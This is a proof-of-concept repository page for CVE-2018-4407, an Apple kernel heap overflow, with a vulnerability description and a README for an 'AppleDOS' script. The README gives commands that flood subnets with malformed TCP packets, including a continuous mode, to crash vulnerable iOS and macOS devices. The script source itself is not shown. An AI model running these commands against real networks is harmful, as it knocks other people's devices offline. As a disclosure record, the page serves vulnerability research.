
CVE-2018-4407 PoC — Kernel buffer error vulnerability in multiple Apple products

Associated Vulnerability
Title: Kernel buffer error vulnerability in multiple Apple products (CVE-2018-4407)
Description: Apple macOS High Sierra and related releases are a dedicated operating system developed by Apple Inc. (USA) for Mac computers. The Kernel component in Apple macOS Sierra 10.12.6 and macOS High Sierra 10.13.6 contains a security vulnerability. An attacker can exploit it to execute arbitrary code (memory corruption).
Description
Messing with Apple devices on the network using CVE-2018-4407 (heap overflow in bad-packet handling)
Readme
# AppleDOS (CVE-2018-4407)

Based on CVE-2018-4407 (https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407), this [tweet](https://twitter.com/ihackbanme/status/1057811965945376768), and this [video](https://twitter.com/kevin_backhouse/status/1057352656560287746). The bug is a heap overflow in bad-packet handling, triggered when the OS tries to send an ICMP error message containing segments of the bad packet back to the sender.

![](demo.gif)

This POC crashes vulnerable Apple devices by sending bad TCP packets containing long TCP/IP header options, so that the ICMP error message overflows when the device tries to send it. You need the ability to send network packets directly to the device (e.g. from the same local network).

The following operating system versions and devices are vulnerable:
- Apple iOS 11 and earlier: all devices
- Apple macOS High Sierra, up to and including 10.13.6: all devices
- Apple macOS Sierra, up to and including 10.12.6: all devices
- Apple OS X El Capitan and earlier: all devices

## WARNING

FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.

## Example

Make sure you have Python 3 and scapy.

```
pip install scapy
# or
pip3 install scapy
```

You may need to run the script as root.

Send bad packets to the 192.168.1.0/24 subnet.

```
sudo ./appledos.py 192.168.1.0/24
```

Show each IP after its packet has been sent.

```
sudo ./appledos.py --verbose 192.168.1.0/24
```

Send bad packets to the 192.168.1.0/24 subnet continuously.

```
sudo ./appledos.py --continuous 192.168.1.0/24
```

Change the destination port (default: 80). Any port works, since devices respond to incoming packets on any port, but be aware of port blocking or firewalls on the host or network.

```
sudo ./appledos.py --continuous --port 22 192.168.1.0/24
```

Send bad packets to a single IP only.

```
sudo ./appledos.py 192.168.1.118
```

Set the maximum number of workers (default: 100).

```
sudo ./appledos.py --worker 10 192.168.1.0/24
```

## Note

This script uses scapy, which has a known issue handling `/dev/bpf` (Berkeley Packet Filter) when sending packets from an OS like macOS with multiple threads. If you encounter `No /dev/bpf handle is available`, try reducing the number of workers to 1 or 2, or simply use Linux as in the demonstration video.
File Snapshot

[4.0K] /data/pocs/e482cbbaa67fd945e541c47dc5ab7635e1dd33ca
├── [3.7K] appledos.py
├── [2.7M] demo.gif
├── [1.0K] LICENSE
└── [2.3K] README.md

0 directories, 4 files